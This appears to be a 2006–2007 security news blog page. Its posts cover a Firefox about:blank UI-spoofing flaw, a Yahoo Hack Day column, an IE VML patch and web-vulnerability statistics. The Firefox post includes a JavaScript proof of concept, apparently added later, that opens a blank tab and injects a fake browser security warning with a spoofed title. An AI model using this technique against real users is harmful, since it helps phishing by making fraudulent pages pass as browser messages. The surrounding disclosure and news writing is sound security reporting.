Business News

February 17, 2007

Error in Firefox can be used to confuse casual users

Firefox suffers from a design flaw that can be used to confuse casual users and evoke a false sense of authority when visiting a fraudulent website. The flaw can also be used to bypass a fix for an old UI spoofing bug that was thought to be addressed. This is a relatively minor issue, but I thought it’s worth reporting. It is possible for a script to open an ‘about:blank’ URL in a new tab; this tab will be opened with a blank address bar (the behavior is different for new windows, where the bar will be grayed out or hidden).

The script can then interact with this document as if it were a page in the same domain, including the ability to inject custom HTML. Some methods of adding this HTML, such as win.document.write(), will update document.location and the address bar to that of the interacting script, which seems like an intuitive choice - the user is informed about the origin of the displayed data.

Since about:blank is a minimal but valid HTML document with a DOM structure, it is also possible to inject code through the use of win.document.body.appendChild() and friends, in which case, the URL bar remains blank, the ‘reload’ button is disabled, and ‘page info’ / ‘page source’ menu options will show no useful data.

Having text displayed in a window that has an empty URL bar can confuse the user as to the origin of the displayed data or security prompts, as if they were internal browser messages; an empty address bar is considerably less suspicious than a shady host name or a panic-inducing data: URL scheme.

Furthermore, there was an old UI spoofing bug - when a window was opened without URL bar and menus, the attacker could use strategically placed graphics and HTML controls (or XUL code), so that the fake URL bar read “google.com”, while an IFRAME below could display “zombo.com” instead. Similarly, he could spoof a native browser-originating modal warning or dialog to have the user do something dumb. This problem was addressed by forcibly prepending current site name to window title for all URL-bar-less windows, so that the Internet origin of such a pop-up is clear, and so that it will have a hard time mimicking a native window.

The problem is that ‘about:blank’ windows that have no document.location defined can be used to inhibit this behavior: the window title can be freely controlled, except for the appended ‘ - Mozilla Firefox’ string, so browser UI elements can be spoofed without the user having a reason to be suspicious.
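The following script is an added illustration of the two injection paths described above (the DOM path that leaves the URL bar blank and lets the title be set freely, and the document.write() path that does not); it is not lcamtuf’s demo from the URL below. The function names, the styling and the warning text are constructed for this example, and the behavior it relies on is the one reported for the Firefox release current in early 2007, so it has to be re-checked against whatever browser is actually under test.

```javascript
// Added example: exercises the two injection paths described above against a
// script-opened about:blank tab. Function names, styling and the warning text
// are constructed for this example; the behaviour it relies on is the one the
// report describes for Firefox of early 2007, so verify it against whatever
// browser you actually test.

// Path 1: DOM mutation only. No document.write() and no assignment to
// location, so the tab keeps its empty URL bar and the title can be set to
// anything (the browser only appends " - Mozilla Firefox").
function injectViaDom(doc, title, lines) {
  doc.title = title;
  var box = doc.createElement('div');
  box.setAttribute('style',
    'font: 13px sans-serif; padding: 1em; border: 1px solid #888;');
  for (var i = 0; i < lines.length; i++) {
    var p = doc.createElement('p');
    p.appendChild(doc.createTextNode(lines[i]));
    box.appendChild(p);
  }
  doc.body.appendChild(box);
  return box;
}

// Path 2: document.write(). Re-parses the document and, per the report,
// updates document.location and the address bar to the opener's URL, which is
// why the DOM path above is the one that matters for spoofing.
function injectViaWrite(doc, html) {
  doc.open();
  doc.write(html);
  doc.close();
}

// Browser-side driver: open the blank tab and populate it with a fake
// browser-style warning (constructed text, not a real Firefox message).
function runDemo(useWrite) {
  var win = window.open('about:blank', '_blank');
  if (!win) {                      // popup blocked
    return null;
  }
  var lines = [
    'Security Warning',
    'Constructed sample text standing in for a spoofed browser dialog.',
    'Opener origin was: ' + window.location.host
  ];
  if (useWrite) {
    injectViaWrite(win.document, '<p>' + lines.join('</p><p>') + '</p>');
  } else {
    injectViaDom(win.document, 'Security Warning', lines);
  }
  return win;
}

// Only run automatically inside a browser; under Node the functions are just
// defined so they can be exercised against a stub document.
if (typeof window !== 'undefined' && typeof window.open === 'function') {
  runDemo(false);
}
```

Load the file from a page on the attacker-controlled host and compare the two tabs: runDemo(false) should produce the empty URL bar and the disabled reload button the report describes, while runDemo(true) should show the opener’s URL in the address bar.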

A quick if naive demonstration of the two attacks described here can be found at this URL:

http://lcamtuf.coredump.cx/ffblank/

October 5, 2006

Portals: How hackerdom was spared from respectability

Just when it was in danger of becoming entirely respectable, the word “hacker” was reclaimed over the weekend on behalf of all of the old-fashioned hackers of the world. It happened at the Yahoo Hack Day, and we have a Yahoo rival, indirectly, to thank.

For several years, Yahoo has been holding Hack Days for its engineers. The idea is to give engineers a day off to come up with an idea, develop a quick and dirty working version of it, and then show it to colleagues. The point, says Yahoo, isn’t so much to get finished products but to encourage outside-the-box collaboration.

This past weekend, Yahoo held the first Hack Day open to the public, and hundreds of programmers made their way to the company’s Sunnyvale, Calif., headquarters to take part.

For its troubles, Yahoo gets to look at some smart programmers it might want to hire. It also gets to tell a recruiting-department-brochure version of life at Yahoo — one full of beer, barbecue and Beck (the musician gave a free concert Friday night), and a place where the only limits to what programmers can work on are their imaginations and their tolerance for Red Bull. All this is opposed to, say, having to slog away in the salt mines of search monetization, which might well be what they would end up doing if they ever really got hired.

Hacker, of course, used to mean “computer-connected bad guy.” That’s still how the word is used on TV. In tech circles, however, it has shed its nefarious undertones and now stands for “computer enthusiast.” (Although, in more rarified programming circles, it has come full circle and is pejorative once more; here a hacker has only a superficial knowledge of programming and gravitates toward quick but impermanent solutions. Think duct tape.)

The pro-hacker aesthetic is now so ascendant that the mere whim of hacker is valued more than even the most studied plan of someone else, such as a marketing dweeb. Indeed, the organizers of Yahoo Hack Day said participants weren’t even supposed to decide before they arrived what their hack project was going to be.

That clearly didn’t happen. A number of Hack Day participants used the opportunity to strut their existing Web sites (“flipmeat,” in the lexicon of the current Web 2.0 business bubble) in front of potential Yahoo acquirers.

Saturday afternoon, after 24 hours of hacking, about 50 projects were presented in two-minute segments to a panel of judges. The majority were mix-and-match combinations of Yahoo offerings: programs to show users when their favorite bands would be playing in town, to allow people looking at a Web site together to blog about it, and to let people uploading photos to attach audio files to them.

Then, in the middle of things, a programmer named Jordan Sissel stepped on stage. For his hack, Mr. Sissel said, he figured out how to store large files — pictures, MP3s, even whole computer programs — on Yahoo’s Del.icio.us Web site.

Del.icio.us is a hot site among the technorati that hasn’t really caught on in the rest of the world. It lets users bookmark Web pages, then see what pages other people have linked to. What was remarkable about Mr. Sissel’s announcement was that Del.icio.us wasn’t a place to store files.

At least not before he got his hands on it. In his allotted two minutes, the 23-year-old showed how he managed to fool the Del.icio.us system into storing a multimegabyte photograph of the San Francisco skyline.

Up until now, everything that hackers had been showing was entirely polite. But Mr. Sissel’s hack was not polite. In fact, it was very naughty — not criminal or unethical, just naughty — in that cool, old-fashioned hacker way. For one thing, it could place an enormous load on the Del.icio.us computers.

But, like any great hack, the program was clever and funny. His hacker forefathers — a lineage that includes Steve Jobs and Steve Wozniak, who before selling the Apple I computer sold “blue boxes” that allowed you to make free phone calls — would have been proud.

The audience roared its approval, and several came up to congratulate him. “Dude, that was a great hack,” one said.

Mr. Sissel’s project didn’t win the “best hack” award. That honor went to something more polite: a small digital camera that would automatically upload photos to Yahoo’s Flickr site.

Later, Mr. Sissel told me he planned his hack Friday morning. Usually, he explained, the URLs that Del.icio.us users send to the site are just a dozen or so characters long. But they can be as long as 65,535 characters. Mr. Sissel thus split up his big file, sent each chunk to Del.icio.us as a URL, then hacked a way to recombine them.

That’s not quite how founders of the site planned on it being used. But doing something someone didn’t plan on is pretty much what hackers are all about.

For the conspiracy buffs among you, Mr. Sissel’s employer is Google. Mr. Sissel says he has worked there four months, in technical support. He insisted he wasn’t acting as some Google agent trying to embarrass Yahoo on its big day.

I couldn’t help but believe him; he had too much geeky insouciance to be lying. No, this guy wasn’t any sort of spy or saboteur. He was a hacker!

http://www.post-gazette.com

September 28, 2006

Latest Zero-day IE Hole Patched

Get this fix right away: Microsoft released an unusual out-of-cycle patch yesterday for the latest zero-day hole in Internet Explorer 6, which could hit systems that were fully patched as of yesterday with a drive-by download.

The threat involves images in a little-used Microsoft format called VML, for Vector Markup Language. Microsoft had originally said it would release a patch on its next scheduled update day, Oct. 10. But my colleague Robert McMillan at the IDG News Service reported that there are already thousands of Web sites exploiting this VML graphics bug. So, to its credit, Microsoft moved more quickly than it originally stated. The ongoing attacks against the similar WMF hole from January likely played a part.

Redmond is distributing the fix via Automatic Updates. I installed the patch on my computers last night as I got the notice (I have updates set to download automatically but wait for my ok to install). You should also be able to run Windows Update manually to get it.

September 27, 2006

Using Google API for SQL Injection

Earlier this month, Mitre revealed that web application vulnerabilities have now claimed the top three spots on the CVE request list. Specifically, the ranking for 2006 is as follows:

  1. Cross Site Scripting (21.5%)
  2. SQL Injection (14%)
  3. PHP includes (9.5%)
  4. Buffer overflows (7.9%)

The statistics are significant as they provide evidence of the prevalence of web application vulnerabilities. Coverage of this issue has however been somewhat misleading, as reports have suggested that it is a measure of what attackers are doing. This assumption is false. CVE requests represent the volume of discovered vulnerabilities in commercial and open source applications; they do not reflect the degree to which those vulnerabilities exist in the real world, nor do they reflect which vulnerabilities attackers are actually using to access vulnerable systems.

Web applications pose a unique threat as programming web applications does not require employing skilled programmers. Anyone with access to various point and click tools is now a web developer. For that reason, I suspect that web application vulnerabilities are even more of a threat in the real world than the Mitre statistics would suggest. CVE numbers tell us that web application vulnerabilities are plaguing software developers but they do not provide insight into vulnerabilities within custom built sites. (more…)
